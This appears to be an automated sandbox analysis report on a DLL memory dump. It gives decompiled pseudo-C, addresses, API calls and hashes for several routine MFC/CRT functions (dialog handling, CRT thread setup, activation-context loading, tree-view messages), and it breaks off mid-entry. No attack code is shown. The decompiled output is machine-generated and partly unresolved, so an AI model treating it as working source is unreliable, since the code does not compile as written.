Associated: 00000002.00000002.350428084.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.350473647.0000000010027000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.350500022.0000000010031000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.350505898.0000000010033000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.350553752.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.350562317.0000000010058000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.350569854.000000001005B000.00000002.00020000.sdmp Download File

Similarity

API ID: Rect$Window$Copy$Long$MessageParentSend
String ID: (
API String ID: 808654186-3887548279
Opcode ID: 9b4950953fa123ccc4b5446fa82b95d7274343c438623bc33d10398666bce4c2
Instruction ID: 07d61241ff87cfd05a19c1b974a282afc4880d23618fbcdc2f3685f0457ab1ac
Opcode Fuzzy Hash: 9b4950953fa123ccc4b5446fa82b95d7274343c438623bc33d10398666bce4c2
Instruction Fuzzy Hash: DE513072900219AFEB01DBB8CC85EEEBBB9FF48290F154125F905F3294D770EA419B50

Uniqueness

Uniqueness Score: -1.00%

Function 1000D72B, Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 139
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E1000D72B(void* __ebx, signed int __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t54;
				void* _t58;
				signed int _t59;
				signed int _t63;
				signed int _t71;
				signed int _t84;
				void* _t94;
				struct HINSTANCE__* _t96;
				signed int _t97;
				void* _t98;
				signed int _t100;
				void* _t101;
				void* _t102;

				_t102 = __eflags;
				_t94 = __edx;
				_push(0x24);
				E100139AB(E10025A19, __ebx, __edi, __esi);
				_t100 = __ecx;
				 *((intOrPtr*)(_t101 - 0x20)) = __ecx;
				 *(_t101 - 0x1c) =  *(__ecx + 0x60);
				 *(_t101 - 0x18) =  *(__ecx + 0x5c);
				_t54 = E10006DEC(__ebx, __edi, __ecx, _t102);
				_t96 =  *(_t54 + 0xc);
				_t84 = 0;
				_t103 =  *(_t100 + 0x58);
				if( *(_t100 + 0x58) != 0) {
					_t96 =  *(E10006DEC(0, _t96, _t100, _t103) + 0xc);
					_t54 = LoadResource(_t96, FindResourceA(_t96,  *(_t100 + 0x58), 5));
					 *(_t101 - 0x18) = _t54;
				}
				if( *(_t101 - 0x18) != _t84) {
					_t54 = LockResource( *(_t101 - 0x18));
					 *(_t101 - 0x1c) = _t54;
				}
				if( *(_t101 - 0x1c) != _t84) {
					_t86 = _t100;
					 *(_t101 - 0x14) = E1000D2A5(_t84, _t100, __eflags);
					E100095F7(__eflags);
					 *(_t101 - 0x28) =  *(_t101 - 0x28) & _t84;
					 *(_t101 - 0x2c) = _t84;
					 *(_t101 - 0x24) = _t84;
					__eflags =  *(_t101 - 0x14) - _t84;
					if(__eflags != 0) {
						__eflags =  *(_t101 - 0x14) - GetDesktopWindow();
						if(__eflags != 0) {
							__eflags = IsWindowEnabled( *(_t101 - 0x14));
							if(__eflags != 0) {
								EnableWindow( *(_t101 - 0x14), 0);
								 *(_t101 - 0x2c) = 1;
								_t84 = E10005329();
								 *(_t101 - 0x24) = _t84;
								__eflags = _t84;
								if(__eflags != 0) {
									_t86 = _t84;
									__eflags =  *((intOrPtr*)( *_t84 + 0x128))();
									if(__eflags != 0) {
										_t86 = _t84;
										__eflags = E1000C432(_t84);
										if(__eflags != 0) {
											_t86 = _t84;
											E1000C44D(_t84, 0);
											 *(_t101 - 0x28) = 1;
										}
									}
								}
							}
						}
					}
					 *(_t101 - 4) =  *(_t101 - 4) & 0x00000000;
					E1000B094(__eflags, _t100);
					_t58 = E1000953E(_t84, _t86,  *(_t101 - 0x14));
					_push(_t96);
					_push(_t58);
					_push( *(_t101 - 0x1c));
					_t59 = E1000D575(_t84, _t100, _t94, _t96, _t100, __eflags);
					_t97 = 0;
					__eflags = _t59;
					if(_t59 != 0) {
						__eflags =  *(_t100 + 0x3c) & 0x00000010;
						if(( *(_t100 + 0x3c) & 0x00000010) != 0) {
							_t98 = 4;
							_t71 = E1000C324(_t100);
							__eflags = _t71 & 0x00000100;
							if((_t71 & 0x00000100) != 0) {
								_t98 = 5;
							}
							E100090FB(_t100, _t98);
							_t97 = 0;
							__eflags = 0;
						}
						__eflags =  *((intOrPtr*)(_t100 + 0x20)) - _t97;
						if( *((intOrPtr*)(_t100 + 0x20)) != _t97) {
							E1000C4BE(_t100, _t97, _t97, _t97, _t97, _t97, 0x97);
						}
					}
					 *(_t101 - 4) =  *(_t101 - 4) | 0xffffffff;
					__eflags =  *(_t101 - 0x28) - _t97;
					if( *(_t101 - 0x28) != _t97) {
						E1000C44D(_t84, 1);
					}
					__eflags =  *(_t101 - 0x2c) - _t97;
					if( *(_t101 - 0x2c) != _t97) {
						EnableWindow( *(_t101 - 0x14), 1);
					}
					__eflags =  *(_t101 - 0x14) - _t97;
					if(__eflags != 0) {
						__eflags = GetActiveWindow() -  *((intOrPtr*)(_t100 + 0x20));
						if(__eflags == 0) {
							SetActiveWindow( *(_t101 - 0x14));
						}
					}
					 *((intOrPtr*)( *_t100 + 0x60))();
					E1000D2E1(_t84, _t100, _t97, _t100, __eflags);
					__eflags =  *(_t100 + 0x58) - _t97;
					if( *(_t100 + 0x58) != _t97) {
						FreeResource( *(_t101 - 0x18));
					}
					_t63 =  *(_t100 + 0x44);
					goto L31;
				} else {
					_t63 = _t54 | 0xffffffff;
					L31:
					return E10013A50(_t63);
				}
			}

0x1000d72b
0x1000d72b
0x1000d72b
0x1000d732
0x1000d737
0x1000d739
0x1000d73f
0x1000d745
0x1000d748
0x1000d74d
0x1000d750
0x1000d752
0x1000d755
0x1000d75c
0x1000d76d
0x1000d773
0x1000d773
0x1000d779
0x1000d77e
0x1000d784
0x1000d784
0x1000d78a
0x1000d794
0x1000d79b
0x1000d79e
0x1000d7a3
0x1000d7a6
0x1000d7a9
0x1000d7ac
0x1000d7af
0x1000d7b7
0x1000d7ba
0x1000d7c5
0x1000d7c7
0x1000d7ce
0x1000d7d4
0x1000d7e0
0x1000d7e2
0x1000d7e5
0x1000d7e7
0x1000d7eb
0x1000d7f3
0x1000d7f5
0x1000d7f7
0x1000d7fe
0x1000d800
0x1000d804
0x1000d806
0x1000d80b
0x1000d80b
0x1000d800
0x1000d7f5
0x1000d7e7
0x1000d7c7
0x1000d7ba
0x1000d812
0x1000d817
0x1000d81f
0x1000d824
0x1000d825
0x1000d826
0x1000d82b
0x1000d830
0x1000d832
0x1000d834
0x1000d836
0x1000d83a
0x1000d83e
0x1000d841
0x1000d846
0x1000d84b
0x1000d84f
0x1000d84f
0x1000d853
0x1000d858
0x1000d858
0x1000d858
0x1000d85a
0x1000d85d
0x1000d86b
0x1000d86b
0x1000d85d
0x1000d870
0x1000d89b
0x1000d89e
0x1000d8a4
0x1000d8a4
0x1000d8a9
0x1000d8ac
0x1000d8b3
0x1000d8b3
0x1000d8b9
0x1000d8bc
0x1000d8c4
0x1000d8c7
0x1000d8cc
0x1000d8cc
0x1000d8c7
0x1000d8d6
0x1000d8db
0x1000d8e0
0x1000d8e3
0x1000d8e8
0x1000d8e8
0x1000d8ee
0x00000000
0x1000d78c
0x1000d78c
0x1000d8f1
0x1000d8f6
0x1000d8f6

APIs

__EH_prolog3_catch.LIBCMT ref: 1000D732
FindResourceA.KERNEL32(?,?,00000005), ref: 1000D765
LoadResource.KERNEL32(?,00000000), ref: 1000D76D

Part of subcall function 100095F7: UnhookWindowsHookEx.USER32(?), ref: 10009627

LockResource.KERNEL32(?,00000024,1000355E,00000074), ref: 1000D77E
GetDesktopWindow.USER32 ref: 1000D7B1
IsWindowEnabled.USER32(?), ref: 1000D7BF
EnableWindow.USER32(?,00000000), ref: 1000D7CE

Part of subcall function 1000C432: IsWindowEnabled.USER32(?), ref: 1000C43B

Part of subcall function 1000C44D: EnableWindow.USER32(?,?), ref: 1000C45E

EnableWindow.USER32(?,00000001), ref: 1000D8B3
GetActiveWindow.USER32 ref: 1000D8BE
SetActiveWindow.USER32(?), ref: 1000D8CC
FreeResource.KERNEL32(?), ref: 1000D8E8

Strings

0Xxt0Ixt@6|t, xrefs: 1000D76D

Memory Dump Source

Source File: 00000002.00000002.350446311.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.350428084.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.350473647.0000000010027000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.350500022.0000000010031000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.350505898.0000000010033000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.350553752.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.350562317.0000000010058000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.350569854.000000001005B000.00000002.00020000.sdmp Download File

Similarity

API ID: Window$Resource$Enable$ActiveEnabled$DesktopFindFreeH_prolog3_catchHookLoadLockUnhookWindows
String ID: 0Xxt0Ixt@6|t
API String ID: 964565984-893219595
Opcode ID: 9de4b5d50d711ca3f5444af41fe3f4e834ac2231003c6f8d92b7622b997960b1
Instruction ID: 496fc3c6f7d2373ffee61e91ce3ebc29e20a8f216b30ff88b6ee79de376685ac
Opcode Fuzzy Hash: 9de4b5d50d711ca3f5444af41fe3f4e834ac2231003c6f8d92b7622b997960b1
Instruction Fuzzy Hash: 3B519E34A00705CFEB11EFA4C8866AEBBF1FF44781F20842AF546B6199CB759D42CB65

Uniqueness

Uniqueness Score: -1.00%

Function 100184F1, Relevance: 21.1, APIs: 8, Strings: 4, Instructions: 57
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 92%

			E100184F1(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				struct HINSTANCE__* _t23;
				intOrPtr _t28;
				intOrPtr _t32;
				intOrPtr _t45;
				void* _t46;

				_t35 = __ebx;
				_push(0xc);
				_push(0x1002e4c0);
				E10013B28(__ebx, __edi, __esi);
				_t44 = L"KERNEL32.DLL";
				_t23 = GetModuleHandleW(L"KERNEL32.DLL");
				if(_t23 == 0) {
					_t23 = E100162FB(_t44);
				}
				 *(_t46 - 0x1c) = _t23;
				_t45 =  *((intOrPtr*)(_t46 + 8));
				 *((intOrPtr*)(_t45 + 0x5c)) = 0x10029f78;
				 *((intOrPtr*)(_t45 + 0x14)) = 1;
				if(_t23 != 0) {
					_t35 = GetProcAddress;
					 *((intOrPtr*)(_t45 + 0x1f8)) = GetProcAddress(_t23, "EncodePointer");
					 *((intOrPtr*)(_t45 + 0x1fc)) = GetProcAddress( *(_t46 - 0x1c), "DecodePointer");
				}
				 *((intOrPtr*)(_t45 + 0x70)) = 1;
				 *((char*)(_t45 + 0xc8)) = 0x43;
				 *((char*)(_t45 + 0x14b)) = 0x43;
				 *(_t45 + 0x68) = 0x10031dc0;
				E1001A8F1(_t35, 0xd);
				 *(_t46 - 4) =  *(_t46 - 4) & 0x00000000;
				InterlockedIncrement( *(_t45 + 0x68));
				 *(_t46 - 4) = 0xfffffffe;
				E100185C6();
				E1001A8F1(_t35, 0xc);
				 *(_t46 - 4) = 1;
				_t28 =  *((intOrPtr*)(_t46 + 0xc));
				 *((intOrPtr*)(_t45 + 0x6c)) = _t28;
				if(_t28 == 0) {
					_t32 =  *0x100323c8; // 0x100322f0
					 *((intOrPtr*)(_t45 + 0x6c)) = _t32;
				}
				E100181AE( *((intOrPtr*)(_t45 + 0x6c)));
				 *(_t46 - 4) = 0xfffffffe;
				return E10013B6D(E100185CF());
			}

0x100184f1
0x100184f1
0x100184f3
0x100184f8
0x100184fd
0x10018503
0x1001850b
0x1001850e
0x10018513
0x10018514
0x10018517
0x1001851a
0x10018524
0x10018529
0x10018531
0x10018539
0x10018549
0x10018549
0x1001854f
0x10018552
0x10018559
0x10018560
0x10018569
0x1001856f
0x10018576
0x1001857c
0x10018583
0x1001858a
0x10018590
0x10018593
0x10018596
0x1001859b
0x1001859d
0x100185a2
0x100185a2
0x100185a8
0x100185ae
0x100185bf

APIs

GetModuleHandleW.KERNEL32(KERNEL32.DLL,1002E4C0,0000000C,1001862C,00000000,00000000,?,1001B6B8,00000000,00000001,00000000,?,1001A87B,00000018,1002E530,0000000C), ref: 10018503
__crt_waiting_on_module_handle.LIBCMT ref: 1001850E

Part of subcall function 100162FB: Sleep.KERNEL32(000003E8,00000000,?,10018454,KERNEL32.DLL,?,?,100187E8,00000000,?,100133E1,00000000,?,?,?,10013444), ref: 10016307
Part of subcall function 100162FB: GetModuleHandleW.KERNEL32(00000000,?,10018454,KERNEL32.DLL,?,?,100187E8,00000000,?,100133E1,00000000,?,?,?,10013444,?), ref: 10016310

GetProcAddress.KERNEL32(00000000,EncodePointer), ref: 10018537
GetProcAddress.KERNEL32(00000000,DecodePointer), ref: 10018547
__lock.LIBCMT ref: 10018569
InterlockedIncrement.KERNEL32(?), ref: 10018576
__lock.LIBCMT ref: 1001858A
___addlocaleref.LIBCMT ref: 100185A8

Strings

Pqxt, xrefs: 10018576
EncodePointer, xrefs: 1001852B
KERNEL32.DLL, xrefs: 100184FD, 10018502, 1001850D
DecodePointer, xrefs: 1001853F

Memory Dump Source

Source File: 00000002.00000002.350446311.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.350428084.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.350473647.0000000010027000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.350500022.0000000010031000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.350505898.0000000010033000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.350553752.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.350562317.0000000010058000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.350569854.000000001005B000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressHandleModuleProc__lock$IncrementInterlockedSleep___addlocaleref__crt_waiting_on_module_handle
String ID: DecodePointer$EncodePointer$KERNEL32.DLL$Pqxt
API String ID: 1028249917-805650618
Opcode ID: 8d99b3bbefcafa9f517f90adacc310e1eb24a2716d83b4632c6a9f2510511548
Instruction ID: 0832a4244f785c7096f649cf3c975ad40b027aaa36c38c83e0242dbd0d3ea643
Opcode Fuzzy Hash: 8d99b3bbefcafa9f517f90adacc310e1eb24a2716d83b4632c6a9f2510511548
Instruction Fuzzy Hash: C2119D75800B41AEE310DF79DC81B8ABBE0FF05350F604529E499AB291DB74EB81CB64

Uniqueness

Uniqueness Score: -1.00%

Function 1000DB3D, Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 60
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 88%

			E1000DB3D(intOrPtr __ecx, intOrPtr _a4) {
				intOrPtr _v8;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t5;
				_Unknown_base(*)()* _t10;
				struct HINSTANCE__* _t18;
				void* _t19;
				char _t21;
				intOrPtr _t23;
				_Unknown_base(*)()* _t24;
				_Unknown_base(*)()* _t25;

				_push(__ecx);
				_t5 = __ecx;
				_t16 = _a4;
				 *((intOrPtr*)(__ecx)) = _a4;
				 *((intOrPtr*)(__ecx + 4)) = 0;
				_v8 = __ecx;
				_t21 =  *0x100584e0; // 0x0
				if(_t21 == 0) {
					_push(_t19);
					_t18 = GetModuleHandleA("KERNEL32");
					_t22 = _t18;
					if(_t18 == 0) {
						L2:
						E1000572D(0, _t16, _t18, _t19, _t22);
					}
					 *0x100584d0 = GetProcAddress(_t18, "CreateActCtxA");
					 *0x100584d4 = GetProcAddress(_t18, "ReleaseActCtx");
					 *0x100584d8 = GetProcAddress(_t18, "ActivateActCtx");
					_t10 = GetProcAddress(_t18, "DeactivateActCtx");
					_pop(_t18);
					 *0x100584dc = _t10;
					_pop(_t19);
					_t23 =  *0x100584d0; // 0x0
					if(_t23 == 0) {
						__eflags =  *0x100584d4; // 0x0
						if(__eflags != 0) {
							goto L2;
						} else {
							__eflags =  *0x100584d8; // 0x0
							if(__eflags != 0) {
								goto L2;
							} else {
								__eflags = _t10;
								if(__eflags != 0) {
									goto L2;
								}
							}
						}
					} else {
						_t24 =  *0x100584d4; // 0x0
						if(_t24 == 0) {
							goto L2;
						} else {
							_t25 =  *0x100584d8; // 0x0
							if(_t25 == 0) {
								goto L2;
							} else {
								_t22 = _t10;
								if(_t10 == 0) {
									goto L2;
								}
							}
						}
					}
					_t5 = _v8;
					 *0x100584e0 = 1;
				}
				return _t5;
			}

0x1000db42
0x1000db43
0x1000db45
0x1000db4b
0x1000db4d
0x1000db50
0x1000db53
0x1000db59
0x1000db5f
0x1000db6c
0x1000db6e
0x1000db70
0x1000db72
0x1000db72
0x1000db72
0x1000db8b
0x1000db98
0x1000dba5
0x1000dbaa
0x1000dbac
0x1000dbad
0x1000dbb2
0x1000dbb3
0x1000dbb9
0x1000dbd1
0x1000dbd7
0x00000000
0x1000dbd9
0x1000dbd9
0x1000dbdf
0x00000000
0x1000dbe1
0x1000dbe1
0x1000dbe3
0x00000000
0x00000000
0x1000dbe3
0x1000dbdf
0x1000dbbb
0x1000dbbb
0x1000dbc1
0x00000000
0x1000dbc3
0x1000dbc3
0x1000dbc9
0x00000000
0x1000dbcb
0x1000dbcb
0x1000dbcd
0x00000000
0x1000dbcf
0x1000dbcd
0x1000dbc9
0x1000dbc1
0x1000dbe5
0x1000dbe8
0x1000dbe8
0x1000dbf1

APIs

GetModuleHandleA.KERNEL32(KERNEL32), ref: 1000DB66
GetProcAddress.KERNEL32(00000000,CreateActCtxA), ref: 1000DB83
GetProcAddress.KERNEL32(00000000,ReleaseActCtx), ref: 1000DB90
GetProcAddress.KERNEL32(00000000,ActivateActCtx), ref: 1000DB9D
GetProcAddress.KERNEL32(00000000,DeactivateActCtx), ref: 1000DBAA

Strings

CreateActCtxA, xrefs: 1000DB7D
DeactivateActCtx, xrefs: 1000DB9F
KERNEL32, xrefs: 1000DB61
ActivateActCtx, xrefs: 1000DB92
ReleaseActCtx, xrefs: 1000DB85

Memory Dump Source

Source File: 00000002.00000002.350446311.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.350428084.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.350473647.0000000010027000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.350500022.0000000010031000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.350505898.0000000010033000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.350553752.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.350562317.0000000010058000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.350569854.000000001005B000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressProc$HandleModule
String ID: ActivateActCtx$CreateActCtxA$DeactivateActCtx$KERNEL32$ReleaseActCtx
API String ID: 667068680-3617302793
Opcode ID: 172114eb7fd8deaf03797f32ec0040a8831a64bbd17833392f87317b35e27021
Instruction ID: db6845fedcdb16a8ff8be86cf35fbdff5512b47533b59cfc99d5598f97251dad
Opcode Fuzzy Hash: 172114eb7fd8deaf03797f32ec0040a8831a64bbd17833392f87317b35e27021
Instruction Fuzzy Hash: 621170B1809262EBE720EF699CC485EBFE8FB852D4316013FEE08A3124D7304A40CF25

Uniqueness

Uniqueness Score: -1.00%

Function 10001732, Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 259
windowCOMMON

Download Yara Rule

C-Code - Quality: 70%

			E10001732(void* __edx, void* __esi, void* __eflags, intOrPtr _a4, long _a8) {
				char _v8;
				signed int _v12;
				char _v16;
				char _v28;
				char _v32;
				char _v36;
				char _v40;
				char _v44;
				char _v48;
				intOrPtr _v72;
				intOrPtr _v76;
				intOrPtr _v84;
				intOrPtr _v88;
				intOrPtr _v92;
				char* _v100;
				intOrPtr _v104;
				void* _v108;
				char _v112;
				intOrPtr _v116;
				char _v120;
				void* _v124;
				char _v128;
				char _v136;
				char _v140;
				char _v144;
				long _v148;
				long _v152;
				char _v156;
				int _v160;
				signed int _v164;
				char _v168;
				int _v172;
				char _v176;
				char _v180;
				signed int _v184;
				int _v192;
				void* __ebx;
				void* __edi;
				void* __ebp;
				signed int _t108;
				long _t113;
				long _t116;
				void* _t119;
				void* _t124;
				int _t128;
				void* _t137;
				void* _t145;
				void* _t150;
				void* _t152;
				int _t156;
				int _t158;
				void* _t171;
				int _t175;
				void* _t218;
				void* _t220;
				void* _t222;
				signed int _t223;
				signed int _t225;

				_t222 = __esi;
				_t218 = __edx;
				_push(0xffffffff);
				_push(E10025EEB);
				_push( *[fs:0x0]);
				_t225 = (_t223 & 0xfffffff8) - 0x8c;
				_t108 =  *0x10031c30; // 0x1f496801
				_push(_t108 ^ _t225);
				 *[fs:0x0] =  &_v16;
				E10001F42( &_v140, E1000517E());
				_v12 = _v12 & 0x00000000;
				_t220 = SendMessageA;
				_t175 = 0x110a;
				_t113 = SendMessageA( *(__esi + 0x20), 0x110a, 4, _a8);
				while(1) {
					_v152 = _t113;
					if(_t113 == 0) {
						break;
					}
					_v148 = SendMessageA( *(_t222 + 0x20), _t175, 1, _v152);
					SendMessageA( *(_t222 + 0x20), 0x1101, 0, _v152);
					_t113 = _v148;
				}
				_t116 = SendMessageA( *(_t222 + 0x20), _t175, 0, 0);
				_push("/*");
				_t228 = _a8 - _t116;
				if(_a8 == _t116) {
					E10002103(_t175,  &_v140);
				} else {
					_push(_a4);
					_push( &_v148);
					_t171 = E10001DB1(_t175, _t220, _t222, _t228);
					_t225 = _t225 + 0xc;
					_v8 = 1;
					E10001F8F( &_v140, _t171);
					_v12 = 0;
					E100010A3(_v152 + 0xfffffff0, _t218);
				}
				_push(1);
				_push( *((intOrPtr*)(_t222 + 0x54)));
				E10005E18(_t175,  &_v120, _t220, _t222, _t228);
				_push(0x80000000);
				_v16 = 2;
				_push(_v148);
				_t119 = E100062E3(_t175,  &_v128, _t218, _t220, _t222, _t228);
				_t229 = _t119;
				if(_t119 != 0) {
					_t29 =  &_v164;
					 *_t29 = _v164 & 0x00000000;
					__eflags =  *_t29;
					E10001F42( &_v160, E1000517E());
					_v28 = 3;
					do {
						_v152 = E10005AA0( &_v136);
						_t124 = E100050E4(_t175,  &_v136, _t220, _t222, __eflags);
						_v28 = 4;
						E10001F8F( &_v164, _t124);
						_v32 = 3;
						E100010A3(_v176 + 0xfffffff0, _t218);
						_t128 =  *((intOrPtr*)(_v144 + 0x38))(0x10,  &_v168);
						__eflags = _t128;
						if(_t128 == 0) {
							_push(2);
							_pop(1);
						} else {
							_v172 = 1;
						}
						_v72 = 1;
						_v76 = 1;
						_v108 = _a8;
						_v84 = _v168;
						_v104 = 0xffff0002;
						_v100 = 0x23;
						SendMessageA( *(_t222 + 0x20), 0x1100, 0,  &_v108);
						__eflags = _v160;
					} while (_v160 != 0);
					E100049BA( &_v144);
					__eflags = _v172;
					if(_v172 != 0) {
						E10001F42( &_v172, E1000517E());
						_push(_a8);
						_v36 = 5;
						_push(4);
						_push(_t175);
						while(1) {
							_t175 = SendMessageA( *(_t222 + 0x20), ??, ??, ??);
							__eflags = _t175;
							if(_t175 == 0) {
								break;
							}
							E10003BB1(_t222, _t175,  &_v160,  &_v112);
							__eflags = _v172 - 1;
							if(__eflags == 0) {
								_push(_t175);
								_push( &_v156);
								_t145 = E100040A3(_t175, _t222, _t220, _t222, __eflags);
								_v40 = 6;
								E10001F8F( &_v176, _t145);
								_v44 = 5;
								E100010A3(_v168 + 0xfffffff0, _t218);
								_push( &_v180);
								_push(_a4);
								_push( &_v164);
								_t150 = E10001D5A(_t175, _t220, _t222, __eflags);
								_push("/*");
								_push(_t150);
								_push( &_v160);
								_v44 = 7;
								_t152 = E10001DB1(_t175, _t220, _t222, __eflags);
								_t225 = _t225 + 0x18;
								_v44 = 8;
								E10001F8F( &_v184, _t152);
								E100010A3(_v164 + 0xfffffff0, _t218);
								_v48 = 5;
								E100010A3(_v168 + 0xfffffff0, _t218);
								_t156 = E10003B46(__eflags, 0x20);
								_v192 = _t156;
								_v48 = 9;
								__eflags = _t156;
								if(__eflags == 0) {
									_t83 =  &_v184;
									 *_t83 = _v184 & 0x00000000;
									__eflags =  *_t83;
								} else {
									_push(1);
									_push( *((intOrPtr*)(_t222 + 0x54)));
									_v192 = E10005E18(_t175, _t156, _t220, _t222, __eflags);
								}
								_v40 = 5;
								_t158 =  *((intOrPtr*)( *_v184 + 0x40))(_v180, 0x80000000);
								__eflags = _t158;
								if(_t158 != 0) {
									__eflags = 1;
									_v92 = 1;
									_v88 = 1;
									_v124 = _t175;
									_v120 = 0xffff0002;
									_v100 = "1";
									_v116 = 0x23;
									SendMessageA( *(_t222 + 0x20), 0x1100, 0,  &_v124);
								}
								E100049BA(_v192);
								 *((intOrPtr*)( *_v192 + 4))(1);
							}
							_push(_t175);
							_push(1);
							_push(0x110a);
						}
						__eflags = _v172 + 0xfffffff0;
						E100010A3(_v172 + 0xfffffff0, _t218);
					}
					__eflags = _v168 + 0xfffffff0;
					E100010A3(_v168 + 0xfffffff0, _t218);
				} else {
					E100049BA( &_v136);
				}
				_v32 = 0;
				E10005A6F(_t175,  &_v144, _t218, _t220, _t222, _t229);
				_t137 = E100010A3(_v164 + 0xfffffff0, _t218);
				 *[fs:0x0] = _v40;
				return _t137;
			}

0x10001732
0x10001732
0x10001738
0x1000173a
0x10001745
0x10001746
0x1000174e
0x10001755
0x1000175d
0x1000176d
0x10001775
0x1000177d
0x10001785
0x1000178e
0x100017b6
0x100017b6
0x100017bc
0x00000000
0x00000000
0x100017a2
0x100017b0
0x100017b2
0x100017b2
0x100017c6
0x100017c8
0x100017cd
0x100017d0
0x1000180e
0x100017d2
0x100017d2
0x100017d9
0x100017da
0x100017df
0x100017e7
0x100017ef
0x100017f4
0x10001803
0x10001803
0x10001813
0x10001815
0x1000181c
0x10001821
0x10001826
0x1000182e
0x10001836
0x1000183b
0x1000183d
0x1000184d
0x1000184d
0x1000184d
0x1000185c
0x10001861
0x10001869
0x10001872
0x1000187f
0x10001889
0x10001891
0x10001896
0x100018a5
0x100018b4
0x100018b7
0x100018b9
0x100018c4
0x100018c6
0x100018bb
0x100018be
0x100018be
0x100018c7
0x100018cb
0x100018d2
0x100018da
0x100018ed
0x100018f5
0x100018fd
0x100018ff
0x100018ff
0x1000190e
0x10001913
0x10001918
0x10001928
0x1000192d
0x10001930
0x10001938
0x1000193a
0x10001a90
0x10001a95
0x10001a97
0x10001a99
0x00000000
0x00000000
0x1000194d
0x10001952
0x10001957
0x1000195d
0x10001962
0x10001965
0x1000196f
0x10001977
0x1000197c
0x1000198b
0x10001994
0x10001995
0x1000199c
0x1000199d
0x100019a2
0x100019a7
0x100019ac
0x100019ad
0x100019b5
0x100019ba
0x100019c2
0x100019ca
0x100019d6
0x100019db
0x100019ea
0x100019f1
0x100019f7
0x100019fb
0x10001a03
0x10001a05
0x10001a19
0x10001a19
0x10001a19
0x10001a07
0x10001a07
0x10001a09
0x10001a13
0x10001a13
0x10001a1e
0x10001a35
0x10001a38
0x10001a3a
0x10001a3e
0x10001a3f
0x10001a43
0x10001a56
0x10001a5a
0x10001a62
0x10001a6a
0x10001a72
0x10001a72
0x10001a78
0x10001a85
0x10001a85
0x10001a88
0x10001a89
0x10001a8b
0x10001a8b
0x10001aa3
0x10001aa6
0x10001aa6
0x10001aaf
0x10001ab2
0x1000183f
0x10001843
0x10001843
0x10001abb
0x10001ac3
0x10001acf
0x10001adb
0x10001ae8

APIs

SendMessageA.USER32 ref: 1000178E
SendMessageA.USER32 ref: 1000179C
SendMessageA.USER32 ref: 100017B0
SendMessageA.USER32 ref: 100017C6
~_Task_impl.LIBCPMT ref: 10001AC3

Part of subcall function 100050E4: __EH_prolog3.LIBCMT ref: 100050EB

SendMessageA.USER32 ref: 100018FD
SendMessageA.USER32 ref: 10001A93

Part of subcall function 10003BB1: SendMessageA.USER32 ref: 10003BD4

Part of subcall function 100040A3: __EH_prolog3.LIBCMT ref: 100040AA
Part of subcall function 100040A3: SendMessageA.USER32 ref: 100040F2
Part of subcall function 100040A3: lstrlenA.KERNEL32(?), ref: 100040FB

Part of subcall function 10001D5A: __EH_prolog3.LIBCMT ref: 10001D61

Part of subcall function 10001DB1: __EH_prolog3.LIBCMT ref: 10001DB8

Part of subcall function 10003B46: _malloc.LIBCMT ref: 10003B64

SendMessageA.USER32 ref: 10001A72

Part of subcall function 10005E18: __EH_prolog3.LIBCMT ref: 10005E1F

Strings

#, xrefs: 10001A6A

Memory Dump Source

Source File: 00000002.00000002.350446311.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.350428084.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.350473647.0000000010027000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.350500022.0000000010031000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.350505898.0000000010033000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.350553752.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.350562317.0000000010058000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.350569854.000000001005B000.00000002.00020000.sdmp Download File

Similarity

API ID: MessageSend$H_prolog3$Task_impl_malloclstrlen
String ID: #
API String ID: 3811581036-1885708031
Opcode ID: 4e5ac6f10f58268711d8f709cd127cb9f333391cfe9cee9915d1870fb69a9c8b
Instruction ID: 324bda6e09aed092b14552070698ec47faa66c1285989a0ed48de13e24599de1
Opcode Fuzzy Hash: 4e5ac6f10f58268711d8f709cd127cb9f333391cfe9cee9915d1870fb69a9c8b
